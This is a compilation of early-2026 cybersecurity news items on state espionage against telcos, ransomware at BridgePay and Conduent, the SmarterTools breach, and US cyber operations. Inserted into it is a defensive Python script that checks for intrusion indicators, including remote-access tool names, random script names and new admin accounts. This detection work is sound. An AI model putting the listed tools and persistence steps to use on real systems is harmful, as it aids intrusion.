4 The threat actor’s activities were initially detected by the telcos, who then notified IMDA and CSA of the breach. CSA, IMDA and other government agencies swiftly launched a coordinated whole-of-Government response, in partnership with the telcos to contain the breach. The operation, codenamed Operation CYBER GUARDIAN, is Singapore’s largest coordinated cyber incident response effort undertaken to date, spanning more than eleven months. Over 100 cyber defenders across agencies such as CSA, IMDA, the Centre for Strategic Infocomm Technologies (CSIT), the Digital and Intelligence Service (DIS), the Government Technology Agency of Singapore (GovTech) and the Internal Security Department (ISD) were involved in the operation.

5 Under Operation CYBER GUARDIAN, the authorities worked closely with the telcos to limit UNC3886’s movement into the networks and ensure our systems remain safe to use. So far, the attack by UNC3886 has not resulted in the same extent of damage as cyberattacks elsewhere.

a. The threat actor was able to gain unauthorised access into some parts of telco networks and systems. In one instance, they were able to gain limited access to critical systems but did not get far enough to have been able to disrupt services.

b. There is no evidence to-date that sensitive or personal data such as customer records were accessed or exfiltrated.

c. There is also no evidence that the threat actor managed to disrupt telecommunications services such as internet availability.

6 Cyber defenders have since implemented remediation measures, closed off UNC3886’s access points and expanded monitoring capabilities in the targeted telcos.

7 The close partnership between the public and private sector in Operation CYBER GUARDIAN reflects our national doctrine of cyber defence, in which government agencies, as well as the private sector come together to collectively defend our cyber space. The doctrine also guides capability development across our cyber ecosystem, sets out the roles that different parties should play in cyber defence, and the actions that should be taken during a cyber incident. This coordinated approach is a key pillar of Singapore’s cyber security.

The fight is ongoing
8 While our collective efforts have contributed to containing the attacks so far, we must be prepared that there may be future attempts to gain access into our telco infrastructure. Telcos are strategic targets for threat actors, including state-sponsored ones. They play a foundational role in powering the digital economy and transmit vast amounts of information, including sensitive data. If threat actors succeed in attacking our telcos, they have the potential to undermine our national security and our economy.

9 The Government takes a serious view of the cyberattack against our telcos. CSA and IMDA have been working closely with our telcos to strengthen their cyber defences, enhance detection capabilities, and deploy active monitoring systems to maintain vigilance against new attempts by UNC3886 to re-enter their networks. Telcos have also been putting in place interventions including joint threat hunting, penetration testing, and levelling up of capabilities. CSA will also be progressively introducing initiatives to raise the level of capabilities across our cyber ecosystem, to enable better and more timely responses against cyber threats and to strengthen Singapore’s cyber defences.

10 Speaking at an engagement event for cyber defenders involved in Operation CYBER GUARDIAN, Minister for Digital Development and Information and Minister-in-charge of Cybersecurity & Smart Nation Group, Josephine Teo, thanked the defenders for their contributions and called for continued vigilance.

11 In her address, she also highlighted the important role played by critical infrastructure operators who are at the frontlines of the battle against cyber threat actors. She said, “Your actions, or inaction, can determine whether we succeed or fail in protecting our critical infrastructure, and our national security. I urge all of you to continue investing in upgrading your systems as well as your capabilities”. In closing, Minister Teo acknowledged the need for the government and critical infrastructure owners to work together as a team, so that we can be effective against sophisticated adversaries and protect everything we care about.

csa.gov.sg EN 2026 Singapore Telecommunications UNC3886 Operation-CYBER-GUARDIAN
Norwegian intelligence discloses country hit by Salt Typhoon campaign https://therecord.media/norawy-intelligence-discloses-salt-typhoon-attacks
09/02/2026 16:04:36

| The Record from Recorded Future News
therecord.media
Alexander Martin
February 6th, 2026

Norway’s domestic security agency confirmed Friday that the Chinese state-sponsored espionage campaign tracked as Salt Typhoon compromised network devices in Norwegian organizations.

The disclosure was made in the Norwegian Police Security Service’s (PST) annual threat assessment for 2026. The agency’s director general, Beate Gangås, said Norway was “facing its most serious security situation since World War II,” citing pressure from multiple foreign intelligence services.

Salt Typhoon is the name U.S. and allied authorities use for a Chinese cyber espionage campaign that has focused heavily on breaching telecommunications and other critical infrastructure. In its report, PST said the actor has exploited vulnerable network devices in Norway.

Gangås said foreign states — particularly China, Russia and Iran — are “conducting intelligence operations and employing hybrid tactics in Norway to undermine our resilience,” stressing the “vital” need for stronger protective security, intelligence and situational awareness.

The assessment said Chinese security and intelligence services have strengthened their ability to operate in Norway, including through cyber operations and human intelligence collection, adding that “the primary intelligence threat from China is in the cyber domain.”

China is described as posing a “substantial” threat and is expected to continue improving its efforts to collect intelligence and map Norwegian digital infrastructure.

PST also warned that China is “systematically” exploiting collaborative research and development projects to bolster its own military capacity and security capabilities.

Salt Typhoon has been linked to significant breaches of telecommunications providers and other critical infrastructure abroad. U.S. officials have said the campaign allowed attackers to intercept communications linked to senior political figures during the 2024 presidential race, including Donald Trump and JD Vance.

Last year, more than a dozen allied countries issued a joint advisory blaming three Chinese technology companies for enabling the espionage campaign, saying the intrusions were used to track the communications and movements of specific targets.

While China dominates the cyber threat picture, PST said Russia remains the principal overall threat to Norway’s security. The agency cited sustained espionage, mapping of critical infrastructure, pressure on Ukrainian refugees, covert intelligence operations using civilian vessels and the risk of sabotage.

Russian intelligence has been “closely monitoring military targets and allied activities and capabilities in Norway for many years,” the report said, adding that the tense geopolitical situation in Europe is likely to drive increased activity.

PST said it expects that to include more Russian cyber operations, influence campaigns and attempts to recruit sources via digital platforms in 2026, describing cyber activity as an integral part of Moscow’s broader intelligence effort alongside traditional espionage and influence work.

“The tense geopolitical situation in Europe means that Russian intelligence has several areas of interest in relation to Norway and other NATO countries. Given the increase in military targets on Norwegian soil, the stronger allied presence, and additional military exercises, we anticipate heightened activity from Russian intelligence services,” the agency added.

Iranian intelligence services are also expected to carry out intelligence and influence operations in Norway, the PST said, warning the regime may attempt to target Western interests through property damage, targeted assassinations, terrorist acts or destructive cyber operations.

The PST said the assessment underlines the need for closer cooperation between authorities and the private sector, particularly operators of critical infrastructure, as foreign intelligence services increasingly combine cyber operations with more traditional espionage and influence campaigns.

therecord.media EN 2026 Norway China Salt-Typhoon campaign
BridgePay Network Solutions Status - BridgePay Gateway - Outage - Under Investigation https://status.bridgepaynetwork.com/incidents/mgg52286dn24
09/02/2026 12:02:36

BridgePay Network Solutions's Status Page - BridgePay Gateway - Outage - Under Investigation.

Update
We are continuing to work with our internal teams and external partners to address the issue.

At this time, we do not have any new information to share. We understand the impact this disruption may have and sincerely appreciate your patience as our teams continue their work.

We will provide another status update tomorrow with any new information available.
Posted 12 hours ago. Feb 08, 2026 - 18:06 EST
Update
At this time, there is no new confirmed information to report. Our teams, along with federal authorities and cybersecurity specialists, are working diligently on forensic analysis, system security, and recovery planning. Restoration efforts are actively underway, and all work is being conducted with care to ensure systems are brought back online safely and securely. We do not have an ETA on when this process will be completed. Because of the nature of the attack (ransomware), we are still in the early stages of this process.

We do want to reiterate this was not a card data breach. No card data was compromised and any file that may have been accessed was encrypted.

We understand the disruption this causes and truly appreciate your continued patience, support, and understanding during this process.

We remain committed to transparent communication and will provide further updates as soon as meaningful new information becomes available.
Posted 2 days ago. Feb 07, 2026 - 16:14 EST
Update
We want to provide a further update regarding the cybersecurity incident affecting our systems.
It is very unfortunate that we are all facing this situation in today’s world, and we are deeply grateful for the patience, understanding, and support we have received — especially from our partners, who have offered assistance and expertise during this time.
We can now confirm that this incident was the result of a ransomware attack. As previously noted, we have engaged both local and federal authorities, along with specialized forensic and recovery teams, to assist with investigation, containment, and system restoration. We are also working closely with leading cybersecurity firms to restore operations as quickly and safely as possible.
Initial forensic findings indicate that no payment card data has been compromised, and any files that may have been accessed were encrypted. At this time, there is no evidence of usable data exposure.
We recognize that recovery may be a lengthy process, and we are working with urgency and diligence to restore systems and services in a secure and responsible manner. Our priority remains protecting our customers, partners, and operations.
We will continue to provide updates as restoration efforts progress and additional verified information becomes available.
Thank you again for your patience, trust and continued support.
Posted 2 days ago. Feb 06, 2026 - 19:08 EST
Identified
At this time, our systems are temporarily unavailable. We are actively working with the U.S. Secret Service forensic team and cybersecurity professionals to secure our environment and obtain clearance to access our systems so we can fully assess the scope of the incident. This will allow us to better understand the extent of the impact and determine the appropriate restoration and recovery process.
Please know that this matter is being treated with the highest priority, and every available resource is being dedicated to resolving the situation safely and responsibly. We do not believe there is a threat or vulnerability for our integrators at this time.
We sincerely appreciate your patience and understanding during this time. We will provide updates as soon as new information becomes available and as restoration efforts progress.
Thank you for your continued trust and support.
Posted 3 days ago. Feb 06, 2026 - 12:00 EST
Update
We are currently experiencing a system-wide service disruption. We have identified that this outage is related to a cybersecurity incident and are actively investigating with our internal teams and external specialists including the FBI.

At this time, we do not have an estimated timeframe for full restoration of services. Our teams are working diligently to assess the impact, contain the issue, and restore systems as quickly and safely as possible.

We will provide additional updates as more information becomes available. We appreciate your patience and understanding during this time.
Posted 3 days ago. Feb 06, 2026 - 06:34 EST
Investigating
BridgePay systems are currently experiencing an outage.
Our team is engaged and investigating the cause.
Expected time for resolution is unknown at this time.
Posted 3 days ago. Feb 06, 2026 - 05:48 EST
This incident affects: PathwayLink Gateway (T-Gate) - Production (Gateway.Itstgate.com - Virtual Terminal, Reporting, API, PathwayLink Boarding Portal), PathwayLink (T-Gate) UAT - Certification Environment (GatewayStage.Itstgate.com - Virtual Terminal, Reporting, API, PathwayLink UAT Boarding Portal), BridgePay Gateway - Production (BridgePay Gateway API - BridgeComm, PayGuardian Cloud API, MyBridgePay Portal - Virtual Terminal and Reporting, BridgePay Gateway WebLink 3.0 - Hosted Payment Page), BridgePay UAT - Certification Environment (BridgePay UAT API - BridgeComm, PayGuardian Cloud UAT API, MyBridgePay UAT Portal - Virtual Terminal and Reporting, BridgePay UAT WebLink 3.0 - Hosted Payment Page), and BridgePay Support (BridgePay Integration Support Portal, BridgePay Phone Support, BridgePay Email Support).

bridgepaynetwork.com EN 2026 ransomware outage
Summary of SmarterTools Breach and SmarterMail CVEs https://portal.smartertools.com/community/a97747/summary-of-smartertools-breach-and-smartermail-cves.aspx
09/02/2026 11:54:37

SmarterTools Derek Curtis - 03/02/2026 at 15:45

As promised, we wanted to provide additional information regarding the network breach we experienced last Thursday (January 29, 2026), along with summaries of our releases and what we have observed both on our servers and when working with SmarterMail customers who have been compromised.

Our Network Breach
Prior to the breach, we had approximately 30 servers/VMs with SmarterMail installed throughout our network. Unfortunately, we were unaware of one VM, set up by an employee, that was not being updated. As a result, that mail server was compromised, which led to the breach.

We isolate our networks, as is best practice, in the event of a breach. Because of this segmentation, our website, shopping cart, My Account portal, and several other services remained online while we mitigated the issue. None of our business applications or account data were affected or compromised.

As for what was affected, it was the network at our office and at another data center which primarily had various labs where we do much of our QC work, etc. At the data center, we hosted our Portal as well as our Hosted SmarterTrack network, which was connected via Active Directory. We didn’t see much affected there and, out of an abundance of caution, we restored some of those servers from the most recent backup, which was six hours old.

Because we are primarily a Linux company now, only about 12 Windows servers looked to be compromised and on those servers, our virus scanners blocked most efforts. None of the Linux servers were affected.

When we first noticed the breach, we instantly shut off all servers at the two locations and we disabled all internet until we completely evaluated all aspects of the breach and either eliminated servers and/or restored servers to be safe.

As a result of all this, our networks look very different than before. We have eliminated Windows from our networks where we could and we no longer use Active Directory services. Our policy in these scenarios is to replace passwords throughout our network as well.

Another thing to note, Sentinel One did a really good job detecting vulnerabilities and preventing servers from being encrypted. We use multiple virus vendors but we saw great results with Sentinel One and wanted to throw a shout out to them and encourage customers to take a look. Any virus scanner you do run on a SmarterMail server, please be sure to look at our knowledge base article on exclusions so you do not corrupt any files. Please review here: https://portal.smartertools.com/kb/a3249/virus-scanner-exceptions-for-smartermail.aspx#

We hope this helps customers understand the scope of the breach and what steps we took. More info on what we saw and what we are seeing on customers’ servers that have been compromised are included below.

Recent SmarterMail Releases
As mentioned in our previous emails, Build 9518 (January 15, 2026) contains all fixes related to the CVEs that were announced. Build 9526 (January 22, 2026) complements those fixes with additional improvements and resolves lesser issues that have been brought to our attention and/or discovered during our internal security audits.

It remains challenging to ensure all customers keep their installations up to date. Every build we release has significance. Even smaller security updates can help prevent issues such as denial-of-service attacks that might otherwise consume excessive server memory or CPU, etc.

Email remains as critical today as ever, and threats against mail servers are as high as they have ever been. The attacks are constantly evolving and technologies are constantly changing, and SmarterTools must make changes that are not always appreciated or understood. Examples include the deprecation of TLS 1.0/1.1 in favor of TLS 1.2 and above, the enforcement of SPF, DKIM, and DMARC requirements by major email providers, and other evolving standards.

Moving forward, we are continuing to audit all of our products and we will continue working with security companies and independent researchers if/when they find bugs or other issues. We are making continual updates—no matter how small—to ensure our products are as secure and optimized as possible.

As of now, there are no major known security issues with SmarterMail.

In addition, we are making a concerted effort to improve transparency in how we communicate security updates. This situation is unprecedented in our company’s history, and we are learning a great deal from it—with the help of our customers. While we do not anticipate a recurrence, we will approach any future incident even more proactively and effectively than we have.

Malicious Behaviors We Have Seen
As you can imagine, we have been working extensively with customers whose systems were vulnerable to attack. We were compromised by a group known as the Warlock Group, and we have observed similar activity on customer machines.

Once these bad actors gain access, they typically install files and wait approximately 6–7 days before taking further action. This explains why some customers experienced a compromise even after updating—the initial breach occurred prior to the update, but malicious activity was triggered later.

They often attempt to take control of the Active Directory server and create new users. From there, they distribute files across Windows machines and attempt to execute files that encrypt data.

Common folders used:
Public folders
AppData
ProgramData
SmarterTools \ SmarterMail directories
Common file names and programs observed:
Velociraptor
JWRapper
Remote Access
SimpleHelp
WinRAR (specifically older, vulnerable versions)
Run.exe
Run.dll
main.exe
Short, random filenames such as e0f8rM_0.ps1 or abc...
Random .aspx files
Other indicators:
Unusual local users or administrators
Suspicious startup items
Newly created or modified scheduled tasks
It is also important to note that CVEs are being discovered across many different products. Some groups install legitimate-looking applications on servers and exploit them later. For example, the Warlock Group frequently targets CVEs in SharePoint and Veeam and has now targeted SmarterMail. Recent Notepad++ update vulnerabilities are another example of how trusted applications can be leveraged to further exploit systems, servers, and desktops.

Based on our observations, the Warlock Group primarily targets Windows environments. We are now primarily a Linux-based company and found no Linux servers exposed to compromise.

A Final Word
We hope this provides a fuller summary of what we have seen and what customers can look for in their own environments. We also hope it demonstrates that we are taking every possible step to prevent issues like this from occurring again and making every effort to consolidate what we’re seeing and sharing with our customers.

Finally, we continue to experience elevated support volumes, but response times are improving and are now measured in hours rather than days.
Derek Curtis
CCO
SmarterTools Inc.
www.smartertools.com
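The indicators in "Malicious Behaviors We Have Seen" above (drop folders, tool and file names, random-looking .ps1 and .aspx names, new local users and administrators, new scheduled tasks and startup items) and the 6–7 day gap between the initial drop and the follow-on action lend themselves to a small correlation check. The block below is an added example, not SmarterTools code: it runs those indicators over a constructed file inventory and a constructed Security-log extract, then answers the two questions the post raises for an operator who patched late, namely whether anything was staged before the update and how long the intruder waited before acting. All paths, event fields and timestamps are constructed; the SimpleHelp install path, the patch time and the random-name heuristic are assumptions.

```python
"""Triage for the post-compromise indicators listed in the post.

Added example, not SmarterTools code. Indicators come from the post; the
inventory, log lines, SimpleHelp path, patch time and random-name rule are
constructed assumptions. Real input would be a recursive directory listing
and a Security-log export from the SmarterMail host.
"""
import re
from datetime import datetime, timezone

# Indicators from the post.
DROP_DIRS = ("\\users\\public\\", "\\appdata\\", "\\programdata\\",
             "\\smartertools\\", "\\smartermail\\")
KNOWN_NAMES = {"run.exe", "run.dll", "main.exe"}
TOOL_HINTS = ("velociraptor", "jwrapper", "simplehelp", "winrar")
# Security event IDs for the account/task/startup changes the post describes
# (4657 requires object auditing on the Run keys to be enabled).
EVENT_IDS = {"4720": "local user created", "4732": "member added to local group",
             "4698": "scheduled task created", "4657": "registry value modified"}

# Constructed inventory, "<UTC timestamp> <path>": one legitimate binary, four drops.
INVENTORY = """\
2026-01-10T09:00:00Z C:\\Program Files\\SmarterTools\\SmarterMail\\Service\\MailService.exe
2026-01-22T03:14:00Z C:\\Users\\Public\\main.exe
2026-01-22T03:14:05Z C:\\ProgramData\\e0f8rM_0.ps1
2026-01-22T03:15:00Z C:\\Program Files\\SmarterTools\\SmarterMail\\MRS\\x9q.aspx
2026-01-22T03:16:00Z C:\\ProgramData\\SimpleHelp\\JWrapper-Remote Access\\Run.exe
"""
# Constructed Security-log extract, "<UTC timestamp> <event id> <fields>".
EVENTS = """\
2026-01-20T08:00:00Z 4624 TargetUserName=admin LogonType=10
2026-01-28T22:10:00Z 4720 TargetUserName=svc_backup SubjectUserName=SMARTERMAIL$
2026-01-28T22:11:00Z 4732 MemberName=svc_backup TargetUserName=Administrators
2026-01-28T22:12:00Z 4698 TaskName=\\Microsoft\\Windows\\Update\\Run
2026-01-28T22:13:00Z 4657 ObjectName=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
"""
PATCHED_AT = "2026-01-23T10:00:00Z"   # constructed: when this host got a fixed build


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def looks_random(name):
    """Heuristic for names like e0f8rM_0.ps1 or x9q.aspx: a short stem with
    digits mixed in, or with no vowels at all. Ordinary page names such as
    login.aspx do not match; tune the rule against your own baseline."""
    m = re.match(r"^([A-Za-z0-9_]{3,10})\.(ps1|aspx)$", name)
    if not m:
        return False
    stem = m.group(1)
    return bool(re.search(r"\d", stem)) or not re.search(r"[aeiou]", stem, re.I)


def file_hits(inventory):
    """Yield (timestamp, path, reasons) for inventory lines that match."""
    for line in inventory.strip().splitlines():
        ts, path = line.split(" ", 1)
        name, low, reasons = path.rsplit("\\", 1)[-1], path.lower(), []
        if name.lower() in KNOWN_NAMES:
            reasons.append("known filename")
        if any(h in low for h in TOOL_HINTS):
            reasons.append("remote-access/packer tool")
        if looks_random(name):
            reasons.append("random-looking script/aspx")
        # A drop folder alone is not an indicator (SmarterMail itself lives in
        # one), so it only strengthens a name-based hit.
        if reasons and any(d in low for d in DROP_DIRS):
            reasons.append("in drop folder")
        if reasons:
            yield parse_ts(ts), path, reasons


def event_hits(log):
    """Yield (timestamp, id, description, fields) for the watched event IDs."""
    for line in log.strip().splitlines():
        ts, eid, fields = line.split(" ", 2)
        if eid in EVENT_IDS:
            yield parse_ts(ts), eid, EVENT_IDS[eid], fields


def triage(inventory, log, patched_at):
    """Correlate drops with follow-on activity. 'staged_before_patch' means a
    drop predates the update, so patching alone did not evict the intruder;
    'dwell_days' is the gap between first drop and first follow-on action
    (the post reports roughly 6-7 days)."""
    files = sorted(file_hits(inventory), key=lambda h: h[0])
    events = sorted(event_hits(log), key=lambda h: h[0])
    first_drop = files[0][0] if files else None
    first_action = events[0][0] if events else None
    return {
        "suspicious_files": [(p, r) for _, p, r in files],
        "suspicious_events": [(i, d, f) for _, i, d, f in events],
        "staged_before_patch": bool(first_drop and first_drop < parse_ts(patched_at)),
        "dwell_days": (first_action - first_drop).days if first_drop and first_action else None,
    }


if __name__ == "__main__":
    result = triage(INVENTORY, EVENTS, PATCHED_AT)
    for path, reasons in result["suspicious_files"]:
        print("FILE ", path, "->", ", ".join(reasons))
    for eid, desc, fields in result["suspicious_events"]:
        print("EVENT", eid, desc, "->", fields)
    print("staged before patch:", result["staged_before_patch"],
          "| dwell days:", result["dwell_days"])
```

On the constructed input the drops land on 22 January, the host is patched on the 23rd, and the new user, group change, scheduled task and Run-key write all appear on the 28th, so the check reports that the server was staged before the patch and that the dwell time was six days, which is the pattern the post describes for customers who were compromised despite updating. The name heuristic is deliberately loose; a WinRAR hit, for instance, only tells you to confirm the version, and the Run-key event is only present if registry auditing was configured beforehand, so a startup-item review (Run keys, Startup folders, services) should still be done by hand.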

smartertools.com EN 2026 Breach
Exclusive: US used cyber weapons to disrupt Iranian air defenses during 2025 strikes https://therecord.media/iran-nuclear-cyber-strikes-us
06/02/2026 10:22:26

| The Record from Recorded Future News
therecord.media
Martin Matishak
February 4th, 2026

The U.S. military digitally disrupted Iranian air missile defense systems during its operation last year against the country’s nuclear program, some of the most sophisticated action Cyber Command has taken to date against Iran.

The U.S. military last year digitally disrupted Iranian air missile defense systems as part of a coordinated operation to destroy the country’s nuclear program, according to several U.S. officials, another sign of America’s growing comfort with employing cyber weapons in warfare.

The strike on a separate military system connected to the nuclear sites at Fordo, Natanz and Isfahan helped to prevent Iran from launching surface-to-air missiles at American warplanes that had entered Iranian airspace, the officials said.

“Military systems often rely on a complex series of components, all working correctly. A vulnerability or weakness at any point can be used to disrupt the entire system,” according to one individual familiar with the matter who, like others, spoke on the condition of anonymity to discuss sensitive information.

In hitting a so-called “aim point” — a mapped node on a computer network, such as a router, a server or some other peripheral device — U.S. operators, enabled by intelligence from the National Security Agency, bypassed what would have been a more difficult task of breaking into a military system located at one, or all, of the fortified nuclear facilities.

“Going ‘upstream’ can be extraordinarily hard, especially against one of our big four adversaries,” another official said, referring to the quartet of Iran, China, Russia and North Korea.

“You need to find the Achilles heel.”

None of the officials would specify what kind of device was attacked. At the request of sources, Recorded Future News withheld certain details about the cyberattack due to national security concerns.

“U.S. Cyber Command was proud to support Operation Midnight Hammer and is fully equipped to execute the orders of the Commander-in-Chief and the Secretary of War at any time and in any place," a command spokesperson said in a statement, without elaborating.

The digital element of June’s Operation Midnight Hammer, which has not been previously reported, is some of the most sophisticated action Cyber Command has taken against Iran in its nearly 16-year history.

Since being granted authorities to augment its offensive capabilities during the first Trump administration, the command skirmished with the Islamic Revolutionary Guard Corps and Iranian hacker groups in the run-up to the 2020 presidential election and moved against government-aligned malicious actors before they could disrupt the 2022 midterms.

Gen. Dan Caine, the chairman of the Joint Chiefs of Staff, publicly lauded Cyber Command’s contribution during a Pentagon press conference after Midnight Hammer concluded, noting it had supported the “strike package” that saw all three nuclear sites hit in a span of less than a half-hour.

The command received similar kudos last month after it conducted cyber operations that officials say knocked out power to Venezuela's capital and disrupted air defense radar, as well as handheld radios, as part of the mission to capture President Nicolás Maduro.

Cyber Command and others “began layering different effects” on Venezuela as commandos approached in helicopters in order to “create a pathway” for them, Caine said during a press conference at Mar-a-Lago.

Little has been shared about the command’s role in the ouster of Maduro, however. And while lawmakers received classified briefings on both digital operations last month, they are seeking more information about the digital attacks on Iran and Venezuela, hoping some details will eventually be shared with the public.

Venezuela has “been in the news and a lot of discussion about the fact that this was a good example of what happens when you combine all of the joint forces, including cyber operations,” Sen. Mike Rounds (R-SD), the chair of the Senate Armed Services cyber subcommittee, said during a hearing with defense officials last week.

“I understand that this [setting] is unclassified but there's a lot of folks out there that might now have a curiosity about this, and they may very well want to be a part of a team in the future that you're going to have to try to recruit,” he added.

The officials, for their part, declined to offer any fresh details and instead touted the use of cyber capabilities.

“I would tell you not just [Operation] Absolute Resolve [in Venezuela] but Midnight Hammer, in a number of other operations, we've really graduated to the point where we’re treating a cyber capability just like we would a kinetic capability, not sprinkling cyber on,” Army Lt. Gen. William Hartman, the acting chief of the command and the NSA, told the subcommittee.

Air Force Brig. Gen. Ryan Messer, deputy director for global operations on the Joint Staff, noted that Caine has put an “emphasis on not just traditional kinetic effects, but the role non-kinetic effects play in all of our global operations, especially cyber.”

He said that over the last six months, the Joint Staff has developed a “non-kinetic effects cell” that is “designed to integrate, coordinate and synchronize all of our non-kinetics into the planning and then, of course, the execution of any operation globally.”

In military jargon, “non-kinetic effects” are produced through capabilities like cyber tools, while “kinetic” generally refers to striking targets with missiles or by other physical means.

“The reality is that we’ve now pulled cyber operators to the forefront,” Messer said.

Iran and Venezuela suggest the “ideal use cases for cyber operations as enablers of conventional military operations,” according to Erica Lonergan, an adjunct fellow at the Foundation for Defense of Democracies’ Center on Cyber and Technology Innovation.

“Altogether, both of these operations reflect the routinization of the use of cyber capabilities during military operations, and we should expect to see more of these in the future. In my view, this is a good thing, because it suggests we are moving beyond seeing cyber as a unique, exquisite (and dangerous) capability,” said Lonergan, a former director of the congressionally mandated Cyberspace Solarium Commission.

“I would not generalize from these cases to make inferences about how this might play out in the context of a contingency involving an adversary like China.”

therecord.media EN 2026 US Iran cyber-weapons military
Data breach at govtech giant Conduent balloons, affecting millions more Americans | TechCrunch https://techcrunch.com/2026/02/05/data-breach-at-govtech-giant-conduent-balloons-affecting-millions-more-americans/
06/02/2026 10:17:10

techcrunch.com
Zack Whittaker
7:25 AM PST · February 5, 2026

The ransomware attack at Conduent allowed hackers to steal a "significant number of individuals’ personal information" from the govtech giant's systems. Conduent handles personal and health data of more than 100 million people across America.

A data breach at government technology giant Conduent appears to affect far more people than first disclosed, with the number of victims potentially stretching to tens of millions of people across the United States.

The January 2025 ransomware attack, which knocked out Conduent’s operations for several days, is now known to affect at least 15.4 million people in Texas alone, about half of the state’s population. Conduent had said in October that 4 million people across the state were affected.

Another 10.5 million people are affected across Oregon, per the state’s attorney general.

Conduent has also notified hundreds of thousands of people across Delaware, Massachusetts, New Hampshire, and other states, according to data breach notifications seen by TechCrunch.

The stolen data includes individuals’ names, Social Security numbers, medical data, and health insurance information.

One of the largest government contractors today, Conduent handles and processes large amounts of personal and sensitive information on behalf of large corporations, government departments, and several U.S. states. The company says its technology and operational support services reach more than 100 million people in the United States across various government healthcare programs.

When contacted with several questions about the data breach, Conduent spokesperson Sean Collins provided a boilerplate statement that did not address them, including whether Conduent knows how many individuals are affected by the cyberattack. The spokesperson would not say if the breach affects more than 100 million people.

Collins said that the company has been working to “conduct a detailed analysis of the affected files to identify the personal information” taken in the breach but would not say how many data breach notifications the company has sent out to date.

Little else is known about the breach, and the company has disclosed few details. Conduent disclosed the cyberattack in April, months after hackers knocked out the company’s systems, which resulted in outages to government services across the United States.

The SafePay ransomware gang took credit for the breach, claiming to have stolen over 8 terabytes of data.

In a later SEC filing, the company said that the stolen datasets “contained a significant number of individuals’ personal information associated with our clients’ end-users,” referring to its corporate and government customers.

Conduent also said it is continuing to notify individuals whose data was stolen in the breach, and plans to conclude alerting individuals by early 2026. The company did not give a more specific timeline.

techcrunch.com EN 2026 Conduent ransomware
X offices raided in France as UK opens fresh investigation into Grok https://www.bbc.com/news/articles/ce3ex92557jo
04/02/2026 10:36:02

bbc.com
Liv McMahon
Technology reporter

Elon Musk's X and Grok platforms are facing increased scrutiny from authorities on both sides of the Channel.
The French offices of Elon Musk's X have been raided by the Paris prosecutor's cyber-crime unit, as part of an investigation into suspected offences including unlawful data extraction and complicity in the possession of child sexual abuse material (CSAM).

The prosecutor's office also said both Musk and former X chief executive Linda Yaccarino had been summoned to appear at hearings in April.

In a separate development, the UK's Information Commissioner's Office (ICO) announced a probe into Musk's AI tool, Grok, over its "potential to produce harmful sexualised image and video content."

Writing on X, Musk said the raid was a "political attack".
The company said in a statement that it was "disappointed" but "not surprised," and accused the Paris Public Prosecutor's office of an "abusive act."

X also denied any wrongdoing and said the raid "endangers free speech."

The investigation began in January 2025 when French prosecutors started looking into content recommended by X's algorithm, before being widened in July that year to include Musk's controversial AI chatbot, Grok.

Yaccarino also took to X to accuse French prosecutors of carrying out "a political vendetta against Americans."

"To be clear: they are lying," added Yaccarino, who left the firm last year.

Following Tuesday's raid, French prosecutors say they are now investigating whether X has broken the law across multiple areas.

Among potential crimes it said it would investigate were complicity in possession or organised distribution of CSAM, infringement of people's image rights with sexual deepfakes and fraudulent data extraction by an organised group.

New UK investigation
Meanwhile, UK authorities have given an update on their investigations into sexual deepfakes created by Grok and shared on X.

The images - often made using real images of women without their consent - prompted a barrage of criticism in January from victims, online safety campaigners and politicians.

The company eventually intervened to prevent the practice, after Ofcom and others launched investigations.

In an update on Tuesday, Ofcom said it was continuing to investigate the platform and was treating it as "a matter of urgency".

But it added it was currently unable to investigate the creation of illegal images by Grok in this case because it did not have sufficient powers relating to chatbots.

However, shortly afterwards the ICO said it was launching its own probe, in conjunction with Ofcom, into the processing of personal data in relation to Grok.

"The reports about Grok raise deeply troubling questions about how people's personal data has been used to generate intimate or sexualised images without their knowledge or consent, and whether the necessary safeguards were put in place to prevent this," said William Malcolm, the ICO's executive director for regulatory risk & innovation.

In late January, the European Commission announced an investigation into X's parent company xAI over concerns about the images.

A Commission spokesperson said it was in touch with France over its search of X's office in Paris.

'Not a free country'
Pavel Durov - founder of the messaging app Telegram - criticised the French authorities on Tuesday, accusing France of being "the only country in the world that is criminally persecuting all social networks that give people some degree of freedom".

"Don't be mistaken: this is not a free country," he added in a post on X.

Durov was arrested and detained in France in August 2024 over alleged moderation lapses on his messaging app, which the Paris prosecutor's office said had failed to curb criminal activity.

He was permitted to leave the country last March after the platform made some changes to the way it operates following the arrest.

These included sharing some user data with authorities in response to legal requests.

bbc.com EN 2026 Grok investigation France UK X Twitter Elon-Musk
County pays $600,000 to pentesters it arrested for assessing courthouse security https://arstechnica.com/security/2026/01/county-pays-600000-to-pentesters-it-arrested-for-assessing-courthouse-security/
31/01/2026 11:45:02

arstechnica.com - Ars Technica
Dan Goodin – Jan. 29, 2026 19:30

Settlement comes more than 6 years after Gary DeMercurio and Justin Wynn's ordeal began.

Two security professionals who were arrested in 2019 after performing an authorized security assessment of a county courthouse in Iowa will receive $600,000 to settle a lawsuit they brought alleging wrongful arrest and defamation.

The case was brought by Gary DeMercurio and Justin Wynn, two penetration testers who at the time were employed by Colorado-based security firm Coalfire Labs. The men had written authorization from the Iowa Judicial Branch to conduct “red-team” exercises, meaning attempted security breaches that mimic techniques used by criminal hackers or burglars.

The objective of such exercises is to test the resilience of existing defenses using the types of real-world attacks the defenses are designed to repel. The rules of engagement for this exercise explicitly permitted “physical attacks,” including “lockpicking,” against judicial branch buildings so long as they didn’t cause significant damage.

A chilling message
The event galvanized security and law enforcement professionals. Despite the legitimacy of the work and the legal contract that authorized it, DeMercurio and Wynn were arrested on charges of felony third-degree burglary and spent 20 hours in jail before being released on $100,000 bail ($50,000 each). The charges were later reduced to misdemeanor trespassing, but even then, Chad Leonard, sheriff of Dallas County, where the courthouse was located, continued to allege publicly that the men had acted illegally and should be prosecuted.

Reputational hits from these sorts of events can be fatal to a security professional’s career. And of course, the prospect of being jailed for performing an authorized security assessment is enough to get the attention of any penetration tester, not to mention the customers that hire them.

“This incident didn’t make anyone safer,” Wynn said in a statement. “It sent a chilling message to security professionals nationwide that helping [a] government identify real vulnerabilities can lead to arrest, prosecution, and public disgrace. That undermines public safety, not enhances it.”

DeMercurio and Wynn’s engagement at the Dallas County Courthouse on September 11, 2019, had been routine. A little after midnight, after finding a side door to the courthouse unlocked, the men closed it and let it lock. They then slipped a makeshift tool through a crack in the door and tripped the locking mechanism. After gaining entry, the pentesters tripped an alarm alerting authorities.

